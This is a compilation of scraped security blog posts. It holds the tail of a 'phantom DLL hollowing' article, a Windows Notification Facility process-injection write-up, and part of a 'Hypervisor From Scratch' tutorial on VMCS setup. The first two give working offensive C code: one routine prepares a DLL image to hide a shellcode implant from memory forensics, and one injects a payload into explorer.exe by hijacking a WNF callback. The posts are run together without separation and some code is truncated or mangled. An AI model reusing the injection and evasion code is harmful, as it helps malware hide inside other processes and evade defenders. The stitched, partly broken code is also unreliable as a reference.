uint16_t *pwCurrentRelocEntry = (uint16_t*)((uint8_t*)pCurrentRelocBlock + sizeof(IMAGE_BASE_RELOCATION));

for (uint32_t dwY = 0; dwY < dwNumBlocks; dwY++, pwCurrentRelocEntry++) {

#ifdef _WIN64





if (((*pwCurrentRelocEntry >> 12) & RELOC_FLAG_ARCH_AGNOSTIC) == RELOC_FLAG_ARCH_AGNOSTIC) {

uint32_t dwRelocEntryRefLocRva = (pCurrentRelocBlock->VirtualAddress + (*pwCurrentRelocEntry & 0x0FFF));

if (dwRelocEntryRefLocRva >= dwStartRVA && dwRelocEntryRefLocRva < dwEndRVA) {

bWithinRange = true;




dwRelocBufOffset += pCurrentRelocBlock->SizeOfBlock;

pCurrentRelocBlock = (IMAGE_BASE_RELOCATION *)((uint8_t*)pCurrentRelocBlock + pCurrentRelocBlock->SizeOfBlock);


return bWithinRange;


In the code above, a gap of sufficient size is identified within our intended DLL image by walking the base relocation data directory. Additionally, as previously mentioned NTDLL.DLL!NtCreateSection will fail if an invalid PE is used as a handle for SEC_IMAGE initialization. In many Windows DLLs, data directories (such as TLS, configuration data, exports and others) are stored within the .text section itself. This means that by overwriting these data directories with a shellcode implant, we may invalidate existing data directories, thus corrupting the PE and causing NTDLL.DLL!NtCreateSection to fail.

for (uint32_t dwX = 0; dwX < pNtHdrs->OptionalHeader.NumberOfRvaAndSizes; dwX++) {

if (pNtHdrs->OptionalHeader.DataDirectory[dwX].VirtualAddress >= pSectHdrs->VirtualAddress && pNtHdrs->OptionalHeader.DataDirectory[dwX].VirtualAddress < (pSectHdrs->VirtualAddress + pSectHdrs->Misc.VirtualSize)) {

pNtHdrs->OptionalHeader.DataDirectory[dwX].VirtualAddress = 0;

pNtHdrs->OptionalHeader.DataDirectory[dwX].Size = 0;



In the code above I am wiping data directories that point within the .text section. A more elegant solution is to look for gaps between the data directories in .text, similar to how I found gaps within the relocations. However, this is less simple than it sounds, as many of these directories themselves contain references to additional data directories (load config is a good example, which contains many RVA which may also fall within .text). For the purposes of this PoC I’ve simply wiped conflicting data directories. Since the module will never be run, doing so will not affect its execution nor will it affect ours since we are using a PIC shellcode.

Last thoughts

Attackers have long been overdue for a major shift and leap forward in their malware design, particularly in the area of memory forensics. I believe that DLL hollowing is likely to become a ubiquitous characteristic of malware memory allocation over the next several years, and this will prompt malware writers to further refine their techniques and adopt my method of phantom DLL hollowing, or new (and still undiscovered) methods of thwarting analysis of PE images in memory vs. on disk. In subsequent posts in this series, I’ll explore the topic of memory stealth through both an attack and defense perspective as it relates to bypassing existing memory scanner tools.

Windows Process Injection : Windows Notification Facility

Original text by modexp


At Blackhat 2018, Alex Ionescu and Gabrielle Viala presented Windows Notification Facility: Peeling the Onion of the Most Undocumented Kernel Attack Surface Yet. It’s an exceptional well-researched presentation that I recommend you watch first before reading this post. In it, they describe WNF in great detail; the functions, data structures, how to interact with it. If you don’t wish to watch the whole video, well, you’re missing out on a cool presentation, but you can always read the slides from their talk here. Gabrielle followed up with a another well-detailed post called Playing with the Windows Notification Facility (WNF) that is also required reading if you want to understand the internals of WNF. You can find some of their tools here which allow dumping information about state names and subscribing for events. As suggested in the presentation, WNF can be used for code redirection/process injection which is what I’ll describe here. wezmaster has demonstrated how to use WNF for persisting .NET payloads here.

Context Header

The table, user and name subscriptions all have a context header.

typedef struct _WNF_CONTEXT_HEADER {
    CSHORT                   NodeTypeCode;
    CSHORT                   NodeByteSize;

The NodeTypeCode field indicates the type of structure that will appear after the header. The following are some examples.


For a target process, we scan all writeable areas of memory and attempt to read sizeof(WNF_SUBSCRIPTION_TABLE). For each successful read, the Header.NodeTypeCode is compared with WNF_NODE_SUBSCRIPTION_TABLE while the NodeByteSize is compared with sizeof(WNF_SUBSCRIPTION_TABLE). The type code and byte size are unique to WNF and can be used to locate WNF structures in memory provided no such similar structures exist.

UPDATEAdam suggested finding the address of WNF table via a function referencing it. You could also search pointers in the .data section or PEB.ProcessHeap. Each of these methods would likely be faster than searching all writeable areas of memory that includes stack memory.

Subscription Table

Created by NTDLL.dll!RtlpInitializeWnf and assigned type 0x911. Both NTDLL.dll!RtlRegisterForWnfMetaNotification and NTDLL.dll!RtlSubscribeWnfStateChangeNotification will create the table if one doesn’t already exist. You could hijack the callback function in TP_TIMER to redirect code, but since this post is about WNF, we need to look at the other structures.

typedef struct _WNF_SUBSCRIPTION_TABLE {
    WNF_CONTEXT_HEADER                Header;
    SRWLOCK                           NamesTableLock;
    LIST_ENTRY                        NamesTableEntry;
    LIST_ENTRY                        SerializationGroupListHead;
    SRWLOCK                           SerializationGroupLock;
    DWORD                             Unknown1[2];
    DWORD                             SubscribedEventSet;
    DWORD                             Unknown2[2];
    PTP_TIMER                         Timer;
    ULONG64                           TimerDueTime;

The main field we’re interested in is the NamesTableEntry that will point to a list of WNF_NAME_SUBSCRIPTION structures.

Serialization Group

Created by NTDLL.dll!RtlpCreateSerializationGroup and assigned type 0x913. Although not important for process injection, It’s here for reference since it wasn’t described in the presentation.

    WNF_CONTEXT_HEADER                Header;
    ULONG                             GroupId;
    LIST_ENTRY                        SerializationGroupList;
    ULONG64                           SerializationGroupValue;
    ULONG64                           SerializationGroupMemberCount;

Name Subscription

Created by NTDLL.dll!RtlpCreateWnfNameSubscription and assigned type 0x912. When subscribing for notifications, an attempt will be made to locate an existing name subscription and simply insert a user subscription into the SubscriptionsList using NTDLL.dll!RtlpAddWnfUserSubToNameSub.

typedef struct _WNF_NAME_SUBSCRIPTION {
    WNF_CONTEXT_HEADER                Header;
    ULONG64                           SubscriptionId;
    WNF_STATE_NAME_INTERNAL           StateName;
    WNF_CHANGE_STAMP                  CurrentChangeStamp;
    LIST_ENTRY                        NamesTableEntry;
    PWNF_TYPE_ID                      TypeId;
    SRWLOCK                           SubscriptionLock;
    LIST_ENTRY                        SubscriptionsListHead;
    ULONG                             NormalDeliverySubscriptions;
    ULONG                             NotificationTypeCount[5];
    PWNF_DELIVERY_DESCRIPTOR          RetryDescriptor;
    ULONG                             DeliveryState;
    ULONG64                           ReliableRetryTime;

The main fields we’re interested in are NamesTableEntry and SubscriptionsListHead for each user subscription that is described next.

User Subscription

Created by NTDLL.dll!RtlpCreateWnfUserSubscription and assigned type 0x914. This is the main structure one would want to modify for process injection or code redirection.

typedef struct _WNF_USER_SUBSCRIPTION {
    WNF_CONTEXT_HEADER                Header;
    LIST_ENTRY                        SubscriptionsListEntry;
    PWNF_NAME_SUBSCRIPTION            NameSubscription;
    PWNF_USER_CALLBACK                Callback;
    PVOID                             CallbackContext;
    ULONG64                           SubProcessTag;
    ULONG                             CurrentChangeStamp;
    ULONG                             DeliveryOptions;
    ULONG                             SubscribedEventSet;
    PWNF_SERIALIZATION_GROUP          SerializationGroup;
    ULONG                             UserSubscriptionCount;
    ULONG64                           Unknown[10];

We’re interested in the Callback and CallbackContext fields. If the context pointed to a virtual function table and one of the methods was executed upon receiving a notification from the kernel, then it probably wouldn’t require modifying Callback at all. To make things easier, the PoC only modifies the Callback value.

Callback Prototype

Six parameters are passed to a callback procedure. Both Buffer and CallbackContext could be utilized to pass in arbitrary code or commands, but since the PoC only executes notepad.exe, the parameters are ignored. That being said, it’s still important to use the same prototype for a payload so that the parameters are safely removed from the stack before returning to the caller.

    _In_     WNF_STATE_NAME   StateName,
    _In_     WNF_CHANGE_STAMP ChangeStamp,
    _In_opt_ PWNF_TYPE_ID     TypeId,
    _In_opt_ PVOID            CallbackContext,
    _In_     PVOID            Buffer,
    _In_     ULONG            BufferSize);

Listing Subscriptions

To help locate the WNF subscription table in a remote process, I wrote a simple tool called wnfscan that searches all writeable areas of memory for the context header. Once found, it parses and displays a list of name and user subscriptions.

Process Injection

Because we have to locate the WNF subscription table by scanning memory, this method of injection is more complicated than others. We don’t search for WNF_USER_SUBSCRIPTIONstructures because they appear higher up in memory and take too long to find. Scanning for the table first is much faster since it’s usually created when the process starts thus appearing lower in memory. Once the table is found, the name subscriptions are read and a user subscription is returned.

VOID wnf_inject(LPVOID payload, DWORD payloadSize) {
    LPVOID                 sa, cs;
    HWND                   hw;
    HANDLE                 hp;
    DWORD                  pid;
    SIZE_T                 wr;
    ULONG64                ns = WNF_SHEL_APPLICATION_STARTED;
    NtUpdateWnfStateData_t _NtUpdateWnfStateData;
    HMODULE                m;
    // 1. Open explorer.exe
    hw = FindWindow(L"Shell_TrayWnd", NULL);
    GetWindowThreadProcessId(hw, &pid);
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    // 2. Locate user subscription
    sa = GetUserSubFromProcess(hp, &us, WNF_SHEL_APPLICATION_STARTED);

    // 3. Allocate RWX memory and write payload
    cs = VirtualAllocEx(hp, NULL, payloadSize,
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    // 4. Update callback and trigger execution of payload
      (PBYTE)sa + offsetof(WNF_USER_SUBSCRIPTION, Callback), 
    m = GetModuleHandle(L"ntdll");
    _NtUpdateWnfStateData = 
      (NtUpdateWnfStateData_t)GetProcAddress(m, "NtUpdateWnfStateData");
      &ns, NULL, 0, 0, NULL, 0, 0);
    // 5. Restore original callback, free memory and close process
      (PBYTE)sa + offsetof(WNF_USER_SUBSCRIPTION, Callback), 
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);


Since it’s possible to transfer data into the address space of a remote process via WNF publishing, it may be possible to avoid using VirtualAllocEx and WriteProcessMemory. Some .NET processes allocate executable memory with write permissions that could be misused by an external process for code injection. A PoC that executes notepad can be found here.

Hypervisor From Scratch – Part 5: Setting up VMCS & Running Guest Code

Original text by Sinaei )


Hello and welcome back to the fifth part of the “Hypervisor From Scratch” tutorial series. Today we will be configuring our previously allocated Virtual Machine Control Structure (VMCS) and in the last, we execute VMLAUNCH and enter to our hardware-virtualized world! Before reading the rest of this part, you have to read the previous parts as they are really dependent.

The full source code of this tutorial is available on GitHub :


Most of this topic derived from Chapter 24 – (VIRTUAL MACHINE CONTROL STRUCTURES) & Chapter 26 – (VM ENTRIES) available at Intel 64 and IA-32 architectures software developer’s manual combined volumes 3. Of course, for more information, you can read the manual as well.

Table of contents

  • Introduction
  • Table of contents
  • VMX Instructions
  • Enhancing VM State Structure
  • Preparing to launch VM
  • VMX Configurations
  • Saving a return point
  • Returning to the previous state
  • VMX Controls
    • VM-Execution Controls
    • VM-entry Control Bits
    • VM-exit Control Bits
    • PIN-Based Execution Control
    • Interruptibility State
  • Configuring VMCS
    • Gathering Machine state for VMCS
    • Setting up VMCS
    • Checking VMCS Layout
  • VM-Exit Handler
    • Resume to next instruction
  • Let’s Test it!
  • Conclusion
  • References

This part is highly inspired from Hypervisor For Beginner and some of methods are exactly like what implemented in that project.

VMX Instructions

In part 3, we implemented VMXOFF function now let’s implement other VMX instructions function. I also make some changes in calling VMXON and VMPTRLD functions to make it more modular.


VMPTRST stores the current-VMCS pointer into a specified memory address. The operand of this instruction is always 64 bits and it’s always a location in memory.

The following function is the implementation of VMPTRST:

12345678910UINT64 VMPTRST(){    PHYSICAL_ADDRESS vmcspa;    vmcspa.QuadPart = 0;    __vmx_vmptrst((unsigned __int64 *)&vmcspa);     DbgPrint(«[*] VMPTRST %llx\n», vmcspa);     return 0;}


This instruction applies to the VMCS which VMCS region resides at the physical address contained in the instruction operand. The instruction ensures that VMCS data for that VMCS (some of these data may be currently maintained on the processor) are copied to the VMCS region in memory. It also initializes some parts of the VMCS region (for example, it sets the launch state of that VMCS to clear).

123456789101112131415BOOLEAN Clear_VMCS_State(IN PVirtualMachineState vmState) {     // Clear the state of the VMCS to inactive    int status = __vmx_vmclear(&vmState->VMCS_REGION);     DbgPrint(«[*] VMCS VMCLAEAR Status is : %d\n», status);    if (status)    {        // Otherwise terminate the VMX        DbgPrint(«[*] VMCS failed to clear with status %d\n», status);        __vmx_off();        return FALSE;    }    return TRUE;}


It marks the current-VMCS pointer valid and loads it with the physical address in the instruction operand. The instruction fails if its operand is not properly aligned, sets unsupported physical-address bits, or is equal to the VMXON pointer. In addition, the instruction fails if the 32 bits in memory referenced by the operand do not match the VMCS revision identifier supported by this processor.

12345678910BOOLEAN Load_VMCS(IN PVirtualMachineState vmState) {     int status = __vmx_vmptrld(&vmState->VMCS_REGION);    if (status)    {        DbgPrint(«[*] VMCS failed with status %d\n», status);        return FALSE;    }    return TRUE;}

In order to implement VMRESUME you need to know about some VMCS fields so the implementation of VMRESUME is after we implement VMLAUNCH. (Later in this topic)

Enhancing VM State Structure

As I told you in earlier parts, we need a structure to save the state of our virtual machine in each core separately. The following structure is used in the newest version of our hypervisor, each field will be described in the rest of this topic.

123456789typedef struct _VirtualMachineState{    UINT64 VMXON_REGION;                    // VMXON region    UINT64 VMCS_REGION;                     // VMCS region    UINT64 EPTP;                            // Extended-Page-Table Pointer    UINT64 VMM_Stack;                       // Stack for VMM in VM-Exit State    UINT64 MSRBitMap;                       // MSRBitMap Virtual Address    UINT64 MSRBitMapPhysical;               // MSRBitMap Physical Address} VirtualMachineState, *PVirtualMachineState;

Note that its not the final _VirtualMachineState structure and we’ll enhance it in future parts.

Preparing to launch VM

In this part, we’re just trying to test our hypervisor in our driver, in the future parts we add some user-mode interactions with our driver so let’s start with modifying our DriverEntry as it’s the first function that executes when our driver is loaded.

Below all the preparation from Part 2, we add the following lines to use our Part 4 (EPT) structures :

123 // Initiating EPTP and VMX PEPTP EPTP = Initialize_EPTP(); Initiate_VMX();

I added an export to a global variable called “VirtualGuestMemoryAddress” that holds the address of where our guest code starts.

Now let’s fill our allocated pages with \xf4 which stands for HLT instruction. I choose HLT because with some special configuration (described below) it’ll cause VM-Exit and return the code to the Host handler.

Let’s create a function which is responsible for running our virtual machine on a specific core.

1void LaunchVM(int ProcessorID , PEPTP EPTP);

I set the ProcessorID to 0, so we’re in the 0th logical processor.

Keep in mind that every logical core has its own VMCS and if you want your guest code to run in other logical processor, you should configure them separately.

Now we should set the affinity to the specific logical processor using Windows KeSetSystemAffinityThread function and make sure to choose the specific core’s vmState as each core has its own separate VMXON and VMCS region.

1234567    KAFFINITY kAffinityMask;        kAffinityMask = ipow(2, ProcessorID);        KeSetSystemAffinityThread(kAffinityMask);         DbgPrint(«[*]\t\tCurrent thread is executing in %d th logical processor.\n», ProcessorID);         PAGED_CODE();

Now, we should allocate a specific stack so that every time a VM-Exit occurs then we can save the registers and calling other Host functions.

I prefer to allocate a separate location for stack instead of using current RSP of the driver but you can use current stack (RSP) too.

The following lines are for allocating and zeroing the stack of our VM-Exit handler.

12345678910  // Allocate stack for the VM Exit Handler. UINT64 VMM_STACK_VA = ExAllocatePoolWithTag(NonPagedPool, VMM_STACK_SIZE, POOLTAG); vmState[ProcessorID].VMM_Stack = VMM_STACK_VA;  if (vmState[ProcessorID].VMM_Stack == NULL) { DbgPrint(«[*] Error in allocating VMM Stack.\n»); return; } RtlZeroMemory(vmState[ProcessorID].VMM_Stack, VMM_STACK_SIZE);

Same as above, allocating a page for MSR Bitmap and adding it to vmState, I’ll describe about them later in this topic.

1234567891011 // Allocate memory for MSRBitMap vmState[ProcessorID].MSRBitMap = MmAllocateNonCachedMemory(PAGE_SIZE);  // should be aligned if (vmState[ProcessorID].MSRBitMap == NULL) { DbgPrint(«[*] Error in allocating MSRBitMap.\n»); return; } RtlZeroMemory(vmState[ProcessorID].MSRBitMap, PAGE_SIZE); vmState[ProcessorID].MSRBitMapPhysical = VirtualAddress_to_PhysicalAddress(vmState[ProcessorID].MSRBitMap); 

Now it’s time to clear our VMCS state and load it as the current VMCS in the specific processor (in our case the 0th logical processor).

The Clear_VMCS_State and Load_VMCS are described above :

123456789101112  // Clear the VMCS State if (!Clear_VMCS_State(&vmState[ProcessorID])) { goto ErrorReturn; }  // Load VMCS (Set the Current VMCS) if (!Load_VMCS(&vmState[ProcessorID])) { goto ErrorReturn; } 

Now it’s time to setup VMCS, A detailed explanation of VMCS setup is available later in this topic.

1234  DbgPrint(«[*] Setting up VMCS.\n»); Setup_VMCS(&vmState[ProcessorID], EPTP); 

The last step is to execute the VMLAUNCH but we shouldn’t forget about saving the current state of the stack (RSP & RBP) because during the execution of Guest code and after returning from VM-Exit, we have to now the current state and return from it. It’s because if you leave the driver with wrong RSP & RBP then you definitely see a BSOD.

12  Save_VMXOFF_State();

Saving a return point

For Save_VMXOFF_State() , I declared two global variables called g_StackPointerForReturningg_BasePointerForReturning. No need to save RIP as the return address is always available in the stack. Just EXTERN it in the assembly file :

123 EXTERN g_StackPointerForReturning:QWORDEXTERN g_BasePointerForReturning:QWORD

The implementation of Save_VMXOFF_State :

123456Save_VMXOFF_State PROC PUBLICMOV g_StackPointerForReturning,rspMOV g_BasePointerForReturning,rbpret Save_VMXOFF_State ENDP

Returning to the previous state

As we saved the current state, if we want to return to the previous state, we have to restore RSP & RBP and clear the stack position and eventually a RET instruction. (I Also add a VMXOFF because it should be executed before return.)

123456789101112131415161718192021222324Restore_To_VMXOFF_State PROC PUBLIC VMXOFF  ; turn it off before existing MOV rsp, g_StackPointerForReturningMOV rbp, g_BasePointerForReturning ; make rsp point to a correct return pointADD rsp,8 ; return Truexor rax,raxmov rax,1 ; return section mov     rbx, [rsp+28h+8h]mov     rsi, [rsp+28h+10h]add     rsp, 020hpop     rdi ret Restore_To_VMXOFF_State ENDP

The “return section” is defined like this because I saw the return section of LaunchVM in IDA Pro.

LaunchVM Return Frame

One important thing that can’t be easily ignored from the above picture is I have such a gorgeous, magnificent & super beautiful IDA PRO theme. I always proud of myself for choosing themes like this ! 


Now it’s time to executed the VMLAUNCH.

12345678910  __vmx_vmlaunch();  // if VMLAUNCH succeed will never be here ! ULONG64 ErrorCode = 0; __vmx_vmread(VM_INSTRUCTION_ERROR, &ErrorCode); __vmx_off(); DbgPrint(«[*] VMLAUNCH Error : 0x%llx\n», ErrorCode); DbgBreakPoint(); 

As the comment describes, if we VMLAUNCH succeed we’ll never execute the other lines. If there is an error in the state of VMCS (which is a common problem) then we have to run VMREAD and read the error code from VM_INSTRUCTION_ERROR field of VMCS, also VMXOFF and print the error. DbgBreakPoint is just a debug breakpoint (int 3) and it can be useful only if you’re working with a remote kernel Windbg Debugger. It’s clear that you can’t test it in your system because executing a cc in the kernel will freeze your system as long as there is no debugger to catch it so it’s highly recommended to create a remote Kernel Debugging machine and test your codes.

Also, It can’t be tested on a remote VMWare debugging (and other virtual machine debugging tools) because nested VMX is not supported in current Intel processors.

Remember we’re still in LaunchVM function and __vmx_vmlaunch() is the intrinsic function for VMLAUNCH & __vmx_vmread is for VMREAD instruction.

Now it’s time to read some theories before configuring VMCS.

VMX Controls

VM-Execution Controls

In order to control our guest features, we have to set some fields in our VMCS. The following tables represent the Primary Processor-Based VM-Execution Controls and Secondary Processor-Based VM-Execution Controls.


We define the above table like this:

123456789101112131415161718192021#define CPU_BASED_VIRTUAL_INTR_PENDING        0x00000004#define CPU_BASED_USE_TSC_OFFSETING           0x00000008#define CPU_BASED_HLT_EXITING                 0x00000080#define CPU_BASED_INVLPG_EXITING              0x00000200#define CPU_BASED_MWAIT_EXITING               0x00000400#define CPU_BASED_RDPMC_EXITING               0x00000800#define CPU_BASED_RDTSC_EXITING               0x00001000#define CPU_BASED_CR3_LOAD_EXITING            0x00008000#define CPU_BASED_CR3_STORE_EXITING           0x00010000#define CPU_BASED_CR8_LOAD_EXITING            0x00080000#define CPU_BASED_CR8_STORE_EXITING           0x00100000#define CPU_BASED_TPR_SHADOW                  0x00200000#define CPU_BASED_VIRTUAL_NMI_PENDING         0x00400000#define CPU_BASED_MOV_DR_EXITING              0x00800000#define CPU_BASED_UNCOND_IO_EXITING           0x01000000#define CPU_BASED_ACTIVATE_IO_BITMAP          0x02000000#define CPU_BASED_MONITOR_TRAP_FLAG           0x08000000#define CPU_BASED_ACTIVATE_MSR_BITMAP         0x10000000#define CPU_BASED_MONITOR_EXITING             0x20000000#define CPU_BASED_PAUSE_EXITING               0x40000000#define CPU_BASED_ACTIVATE_SECONDARY_CONTROLS 0x80000000

In the earlier versions of VMX, there is nothing like Secondary Processor-Based VM-Execution Controls. Now if you want to use the secondary table you have to set the 31st bit of the first table otherwise it’s like the secondary table field with zeros.


The definition of the above table is this (we ignore some bits, you can define them if you want to use them in your hypervisor):

12345#define CPU_BASED_CTL2_ENABLE_EPT            0x2#define CPU_BASED_CTL2_RDTSCP                0x8#define CPU_BASED_CTL2_ENABLE_VPID            0x20#define CPU_BASED_CTL2_UNRESTRICTED_GUEST    0x80#define CPU_BASED_CTL2_ENABLE_VMFUNC        0x2000

VM-entry Control Bits

The VM-entry controls constitute a 32-bit vector that governs the basic operation of VM entries.

12345// VM-entry Control Bits #define VM_ENTRY_IA32E_MODE             0x00000200#define VM_ENTRY_SMM                    0x00000400#define VM_ENTRY_DEACT_DUAL_MONITOR     0x00000800#define VM_ENTRY_LOAD_GUEST_PAT         0x00004000

VM-exit Control Bits

The VM-exit controls constitute a 32-bit vector that governs the basic operation of VM exits.

12345// VM-exit Control Bits #define VM_EXIT_IA32E_MODE              0x00000200#define VM_EXIT_ACK_INTR_ON_EXIT        0x00008000#define VM_EXIT_SAVE_GUEST_PAT          0x00040000#define VM_EXIT_LOAD_HOST_PAT           0x00080000

PIN-Based Execution Control

The pin-based VM-execution controls constitute a 32-bit vector that governs the handling of asynchronous events (for example: interrupts). We’ll use it in the future parts, but for now let define it in our Hypervisor.

123456// PIN-Based Execution#define PIN_BASED_VM_EXECUTION_CONTROLS_EXTERNAL_INTERRUPT                 0x00000001#define PIN_BASED_VM_EXECUTION_CONTROLS_NMI_EXITING                         0x00000004#define PIN_BASED_VM_EXECUTION_CONTROLS_VIRTUAL_NMI                         0x00000010#define PIN_BASED_VM_EXECUTION_CONTROLS_ACTIVE_VMX_TIMER                 0x00000020 #define PIN_BASED_VM_EXECUTION_CONTROLS_PROCESS_POSTED_INTERRUPTS        0x00000040

Interruptibility State

The guest-state area includes the following fields that characterize guest state but which do not correspond to processor registers:
Activity state (32 bits). This field identifies the logical processor’s activity state. When a logical processor is executing instructions normally, it is in the active state. Execution of certain instructions and the occurrence of certain events may cause a logical processor to transition to an inactive state in which it ceases to execute instructions.
The following activity states are defined:
— 0: Active. The logical processor is executing instructions normally.

— 1: HLT. The logical processor is inactive because it executed the HLT instruction.
— 2: Shutdown. The logical processor is inactive because it incurred a triple fault1 or some other serious error.
— 3: Wait-for-SIPI. The logical processor is inactive because it is waiting for a startup-IPI (SIPI).

• Interruptibility state (32 bits). The IA-32 architecture includes features that permit certain events to be blocked for a period of time. This field contains information about such blocking. Details and the format of this field are given in Table below.


Configuring VMCS

Gathering Machine state for VMCS

In order to configure our Guest-State & Host-State we need to have details about current system state, e.g Global Descriptor Table Address, Interrupt Descriptor Table Add and Read all the Segment Registers.

These functions describe how all of these data can be gathered.

GDT Base :

123456Get_GDT_Base PROC    LOCAL   gdtr[10]:BYTE    sgdt    gdtr    mov     rax, QWORD PTR gdtr[2]    retGet_GDT_Base ENDP

CS segment register:

1234GetCs PROC    mov     rax, cs    retGetCs ENDP

DS segment register:

1234GetDs PROC    mov     rax, ds    retGetDs ENDP

ES segment register:

1234GetEs PROC    mov     rax, es    retGetEs ENDP

SS segment register:

1234GetSs PROC    mov     rax, ss    retGetSs ENDP

FS segment register:

1234GetFs PROC    mov     rax, fs    retGetFs ENDP

GS segment register:

1234GetGs PROC    mov     rax, gs    retGetGs ENDP


1234GetLdtr PROC    sldt    rax    retGetLdtr ENDP

TR (task register):

1234GetTr PROC    str rax    retGetTr ENDP

Interrupt Descriptor Table:

1234567Get_IDT_Base PROC    LOCAL   idtr[10]:BYTE     sidt    idtr    mov     rax, QWORD PTR idtr[2]    retGet_IDT_Base ENDP

GDT Limit:

1234567Get_GDT_Limit PROC    LOCAL   gdtr[10]:BYTE     sgdt    gdtr    mov     ax, WORD PTR gdtr[0]    retGet_GDT_Limit ENDP

IDT Limit:

1234567Get_IDT_Limit PROC    LOCAL   idtr[10]:BYTE     sidt    idtr    mov     ax, WORD PTR idtr[0]    retGet_IDT_Limit ENDP


12345Get_RFLAGS PROC    pushfq    pop     rax    retGet_RFLAGS ENDP

Setting up VMCS

Let’s get down to business (We have a long way to go).

This section starts with defining a function called Setup_VMCS.

1BOOLEAN Setup_VMCS(IN PVirtualMachineState vmState, IN PEPTP EPTP);

This function is responsible for configuring all of the options related to VMCS and of course the Guest & Host state.

These task needs a special instruction called “VMWRITE”.

VMWRITE, writes the contents of a primary source operand (register or memory) to a specified field in a VMCS. In VMX root operation, the instruction writes to the current VMCS. If executed in VMX non-root operation, the instruction writes to the VMCS referenced by the VMCS link pointer field in the current VMCS.

The VMCS field is specified by the VMCS-field encoding contained in the register secondary source operand. 

The following enum contains most of the VMCS field need for VMWRITE & VMREAD instructions. (newer processors add newer fields.)

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134enum VMCS_FIELDS { GUEST_ES_SELECTOR = 0x00000800, GUEST_CS_SELECTOR = 0x00000802, GUEST_SS_SELECTOR = 0x00000804, GUEST_DS_SELECTOR = 0x00000806, GUEST_FS_SELECTOR = 0x00000808, GUEST_GS_SELECTOR = 0x0000080a, GUEST_LDTR_SELECTOR = 0x0000080c, GUEST_TR_SELECTOR = 0x0000080e, HOST_ES_SELECTOR = 0x00000c00, HOST_CS_SELECTOR = 0x00000c02, HOST_SS_SELECTOR = 0x00000c04, HOST_DS_SELECTOR = 0x00000c06, HOST_FS_SELECTOR = 0x00000c08, HOST_GS_SELECTOR = 0x00000c0a, HOST_TR_SELECTOR = 0x00000c0c, IO_BITMAP_A = 0x00002000, IO_BITMAP_A_HIGH = 0x00002001, IO_BITMAP_B = 0x00002002, IO_BITMAP_B_HIGH = 0x00002003, MSR_BITMAP = 0x00002004, MSR_BITMAP_HIGH = 0x00002005, VM_EXIT_MSR_STORE_ADDR = 0x00002006, VM_EXIT_MSR_STORE_ADDR_HIGH = 0x00002007, VM_EXIT_MSR_LOAD_ADDR = 0x00002008, VM_EXIT_MSR_LOAD_ADDR_HIGH = 0x00002009, VM_ENTRY_MSR_LOAD_ADDR = 0x0000200a, VM_ENTRY_MSR_LOAD_ADDR_HIGH = 0x0000200b, TSC_OFFSET = 0x00002010, TSC_OFFSET_HIGH = 0x00002011, VIRTUAL_APIC_PAGE_ADDR = 0x00002012, VIRTUAL_APIC_PAGE_ADDR_HIGH = 0x00002013, VMFUNC_CONTROLS = 0x00002018, VMFUNC_CONTROLS_HIGH = 0x00002019, EPT_POINTER = 0x0000201A, EPT_POINTER_HIGH = 0x0000201B, EPTP_LIST = 0x00002024, EPTP_LIST_HIGH = 0x00002025, GUEST_PHYSICAL_ADDRESS = 0x2400, GUEST_PHYSICAL_ADDRESS_HIGH = 0x2401, VMCS_LINK_POINTER = 0x00002800, VMCS_LINK_POINTER_HIGH = 0x00002801, GUEST_IA32_DEBUGCTL = 0x00002802, GUEST_IA32_DEBUGCTL_HIGH = 0x00002803, PIN_BASED_VM_EXEC_CONTROL = 0x00004000, CPU_BASED_VM_EXEC_CONTROL = 0x00004002, EXCEPTION_BITMAP = 0x00004004, PAGE_FAULT_ERROR_CODE_MASK = 0x00004006, PAGE_FAULT_ERROR_CODE_MATCH = 0x00004008, CR3_TARGET_COUNT = 0x0000400a, VM_EXIT_CONTROLS = 0x0000400c, VM_EXIT_MSR_STORE_COUNT = 0x0000400e, VM_EXIT_MSR_LOAD_COUNT = 0x00004010, VM_ENTRY_CONTROLS = 0x00004012, VM_ENTRY_MSR_LOAD_COUNT = 0x00004014, VM_ENTRY_INTR_INFO_FIELD = 0x00004016, VM_ENTRY_EXCEPTION_ERROR_CODE = 0x00004018, VM_ENTRY_INSTRUCTION_LEN = 0x0000401a, TPR_THRESHOLD = 0x0000401c, SECONDARY_VM_EXEC_CONTROL = 0x0000401e, VM_INSTRUCTION_ERROR = 0x00004400, VM_EXIT_REASON = 0x00004402, VM_EXIT_INTR_INFO = 0x00004404, VM_EXIT_INTR_ERROR_CODE = 0x00004406, IDT_VECTORING_INFO_FIELD = 0x00004408, IDT_VECTORING_ERROR_CODE = 0x0000440a, VM_EXIT_INSTRUCTION_LEN = 0x0000440c, VMX_INSTRUCTION_INFO = 0x0000440e, GUEST_ES_LIMIT = 0x00004800, GUEST_CS_LIMIT = 0x00004802, GUEST_SS_LIMIT = 0x00004804, GUEST_DS_LIMIT = 0x00004806, GUEST_FS_LIMIT = 0x00004808, GUEST_GS_LIMIT = 0x0000480a, GUEST_LDTR_LIMIT = 0x0000480c, GUEST_TR_LIMIT = 0x0000480e, GUEST_GDTR_LIMIT = 0x00004810, GUEST_IDTR_LIMIT = 0x00004812, GUEST_ES_AR_BYTES = 0x00004814, GUEST_CS_AR_BYTES = 0x00004816, GUEST_SS_AR_BYTES = 0x00004818, GUEST_DS_AR_BYTES = 0x0000481a, GUEST_FS_AR_BYTES = 0x0000481c, GUEST_GS_AR_BYTES = 0x0000481e, GUEST_LDTR_AR_BYTES = 0x00004820, GUEST_TR_AR_BYTES = 0x00004822, GUEST_INTERRUPTIBILITY_INFO = 0x00004824, GUEST_ACTIVITY_STATE = 0x00004826, GUEST_SM_BASE = 0x00004828, GUEST_SYSENTER_CS = 0x0000482A, HOST_IA32_SYSENTER_CS = 0x00004c00, CR0_GUEST_HOST_MASK = 0x00006000, CR4_GUEST_HOST_MASK = 0x00006002, CR0_READ_SHADOW = 0x00006004, CR4_READ_SHADOW = 0x00006006, CR3_TARGET_VALUE0 = 0x00006008, CR3_TARGET_VALUE1 = 0x0000600a, CR3_TARGET_VALUE2 = 0x0000600c, CR3_TARGET_VALUE3 = 0x0000600e, EXIT_QUALIFICATION = 0x00006400, 